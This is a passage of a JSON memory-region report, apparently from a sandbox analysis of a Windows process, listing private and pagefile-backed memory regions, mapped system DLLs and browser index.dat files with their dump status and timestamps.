"size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_491", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:31.596", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_492", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:31.596", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4849663, "entry_point": 0, "filename": null, "id": "region_493", "name": "private_0x0000000000460000", "norm_filename": null, "region_type": "private_memory", "start_va": 4587520, "timestamp": "00:00:31.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 12386304, "type": "region", "version": 1 }, "end_va": 13434879, "entry_point": 0, "filename": null, "id": "region_494", "name": "private_0x0000000000bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 12386304, "timestamp": "00:00:31.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1956642816, "type": "region", "version": 1 }, "end_va": 1956777983, "entry_point": 1956648030, "filename": "\\Windows\\SysWOW64\\ntmarta.dll", "id": "region_495", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\syswow64\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1956642816, "timestamp": "00:00:31.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_496", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:00:31.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1982464000, "type": "region", "version": 1 }, "end_va": 1982746623, "entry_point": 1982468577, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_497", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1982464000, "timestamp": "00:00:31.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_498", "name": "pagefile_0x0000000000110000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1114112, "timestamp": "00:00:31.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_499", "name": "private_0x0000000000120000", "norm_filename": null, "region_type": "private_memory", "start_va": 1179648, "timestamp": "00:00:31.657", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1943732224, "type": "region", "version": 1 }, "end_va": 1944256511, "entry_point": 1943812041, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_500", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1943732224, "timestamp": "00:00:31.665", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000501-addr_0x0000000000a10000-size_0x00000000001a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_169", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1703936, "start_va": 10551296, "type": "region", "version": 1 }, "end_va": 12255231, "entry_point": 0, "filename": null, "id": "region_501", "name": "private_0x0000000000a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 10551296, "timestamp": "00:00:31.667", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 10551296, "type": "region", "version": 1 }, "end_va": 11464703, "entry_point": 0, "filename": null, "id": "region_502", "name": "pagefile_0x0000000000a10000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10551296, "timestamp": "00:00:31.669", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11993088, "type": "region", "version": 1 }, "end_va": 12255231, "entry_point": 0, "filename": null, "id": "region_503", "name": "private_0x0000000000b70000", "norm_filename": null, "region_type": "private_memory", "start_va": 11993088, "timestamp": "00:00:31.669", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1940979712, "type": "region", "version": 1 }, "end_va": 1941057535, "entry_point": 1940987199, "filename": "\\Windows\\SysWOW64\\dwmapi.dll", "id": "region_504", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\syswow64\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1940979712, "timestamp": "00:00:31.674", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35651584, "type": "region", "version": 1 }, "end_va": 38596607, "entry_point": 35651584, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_505", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35651584, "timestamp": "00:00:31.689", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 42020863, "entry_point": 0, "filename": null, "id": "region_506", "name": "pagefile_0x00000000024d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38600704, "timestamp": "00:00:31.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1969553408, "type": "region", "version": 1 }, "end_va": 1982439423, "entry_point": 1970083329, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_507", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1969553408, "timestamp": "00:00:31.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1249279, "entry_point": 0, "filename": null, "id": "region_508", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:31.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1957953536, "type": "region", "version": 1 }, "end_va": 1957998591, "entry_point": 1957960082, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_509", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1957953536, "timestamp": "00:00:31.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1359871, "entry_point": 1310720, "filename": "\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_510", "name": "index.dat", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:00:31.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1409023, "entry_point": 1376256, "filename": "\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_511", "name": "index.dat", "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:00:31.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 1441792, "filename": "\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_512", "name": "index.dat", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1441792, "timestamp": "00:00:31.781", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 1900544, "filename": "\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat", "id": "region_513", "name": "index.dat", "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat", "region_type": "memory_mapped_file", "start_va": 1900544, "timestamp": "00:00:31.800", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_514", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:00:31.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_515", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:00:31.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_516", "name": "pagefile_0x0000000000180000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1572864, "timestamp": "00:00:31.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 2162688, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_517", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 2162688, "timestamp": "00:00:31.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2236415, "entry_point": 0, "filename": null, "id": "region_518", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:00:31.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1954676736, "type": "region", "version": 1 }, "end_va": 1956372479, "entry_point": 1954866869, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_519", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1954676736, "timestamp": "00:00:31.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2301951, "entry_point": 0, "filename": null, "id": "region_521", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:00:31.824", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_522", "name": "pagefile_0x0000000000210000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2162688, "timestamp": "00:00:31.859", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2367487, "entry_point": 0, "filename": null, "id": "region_523", "name": "pagefile_0x0000000000240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2359296, "timestamp": "00:00:31.960", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997733888, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_524", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:00:31.960", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992818688, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_525", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:00:31.975", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000526-addr_0x00000000003c0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_170", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 0, "filename": null, "id": "region_526", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:00:31.985", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1964113920, "type": "region", "version": 1 }, "end_va": 1964392447, "entry_point": 1964113920, "filename": "\\Windows\\SysWOW64\\dnsapi.dll", "id": "region_527", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\syswow64\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1964113920, "timestamp": "00:00:32.006", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_528", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:00:32.024", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1963982848, "type": "region", "version": 1 }, "end_va": 1964097535, "entry_point": 1963982848, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_529", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1963982848, "timestamp": "00:00:32.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1966080000, "type": "region", "version": 1 }, "end_va": 1966108671, "entry_point": 1966080000, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_530", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1966080000, "timestamp": "00:00:32.060", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 5570559, "entry_point": 0, "filename": null, "id": "region_531", "name": "private_0x0000000000510000", "norm_filename": null, "region_type": "private_memory", "start_va": 5308416, "timestamp": "00:00:32.084", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 43843584, "type": "region", "version": 1 }, "end_va": 44892159, "entry_point": 0, "filename": null, "id": "region_532", "name": "private_0x00000000029d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43843584, "timestamp": "00:00:32.084", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_533", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:00:32.084", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 1963589632, "type": "region", "version": 1 }, "end_va": 1963925503, "entry_point": 1963589632, "filename": "\\Windows\\SysWOW64\\rasapi32.dll", "id": "region_534", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\syswow64\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 1963589632, "timestamp": "00:00:32.107", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1963458560, "type": "region", "version": 1 }, "end_va": 1963544575, "entry_point": 1963458560, "filename": "\\Windows\\SysWOW64\\rasman.dll", "id": "region_535", "name": "rasman.dll", "norm_filename": "c:\\windows\\syswow64\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 1963458560, "timestamp": "00:00:32.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1963393024, "type": "region", "version": 1 }, "end_va": 1963446271, "entry_point": 1963393024, "filename": "\\Windows\\SysWOW64\\rtutils.dll", "id": "region_536", "name": "rtutils.dll", "norm_filename": "c:\\windows\\syswow64\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 1963393024, "timestamp": "00:00:32.170", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 14090240, "type": "region", "version": 1 }, "end_va": 14352383, "entry_point": 0, "filename": null, "id": "region_537", "name": "private_0x0000000000d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 14090240, "timestamp": "00:00:32.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 45809664, "type": "region", "version": 1 }, "end_va": 46858239, "entry_point": 0, "filename": null, "id": "region_538", "name": "private_0x0000000002bb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 45809664, "timestamp": "00:00:32.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_539", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:00:32.182", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000540-addr_0x00000000002a0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_171", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2756607, "entry_point": 0, "filename": null, "id": "region_540", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:00:32.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42729472, "type": "region", "version": 1 }, "end_va": 42991615, "entry_point": 0, "filename": null, "id": "region_541", "name": "private_0x00000000028c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42729472, "timestamp": "00:00:32.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 48431104, "type": "region", "version": 1 }, "end_va": 49479679, "entry_point": 0, "filename": null, "id": "region_542", "name": "private_0x0000000002e30000", "norm_filename": null, "region_type": "private_memory", "start_va": 48431104, "timestamp": "00:00:32.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_543", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:00:32.191", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2756607, "entry_point": 0, "filename": null, "id": "region_544", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:00:32.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 13828096, "type": "region", "version": 1 }, "end_va": 14090239, "entry_point": 0, "filename": null, "id": "region_545", "name": "private_0x0000000000d30000", "norm_filename": null, "region_type": "private_memory", "start_va": 13828096, "timestamp": "00:00:32.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 46858240, "type": "region", "version": 1 }, "end_va": 47906815, "entry_point": 0, "filename": null, "id": "region_546", "name": "private_0x0000000002cb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46858240, "timestamp": "00:00:32.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 51183616, "type": "region", "version": 1 }, "end_va": 52232191, "entry_point": 0, "filename": null, "id": "region_547", "name": "private_0x00000000030d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51183616, "timestamp": "00:00:32.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1963327488, "type": "region", "version": 1 }, "end_va": 1963352063, "entry_point": 1963327488, "filename": "\\Windows\\SysWOW64\\SensApi.dll", "id": "region_548", "name": "sensapi.dll", "norm_filename": "c:\\windows\\syswow64\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 1963327488, "timestamp": "00:00:32.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_549", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:00:32.212", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1963261952, "type": "region", "version": 1 }, "end_va": 1963327487, "entry_point": 1963261952, "filename": "\\Windows\\SysWOW64\\nlaapi.dll", "id": "region_550", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\syswow64\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1963261952, "timestamp": "00:00:32.266", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000551-addr_0x00000000003c0000-size_0x0000000000030000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_172", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 196608, "start_va": 3932160, "type": "region", "version": 1 }, 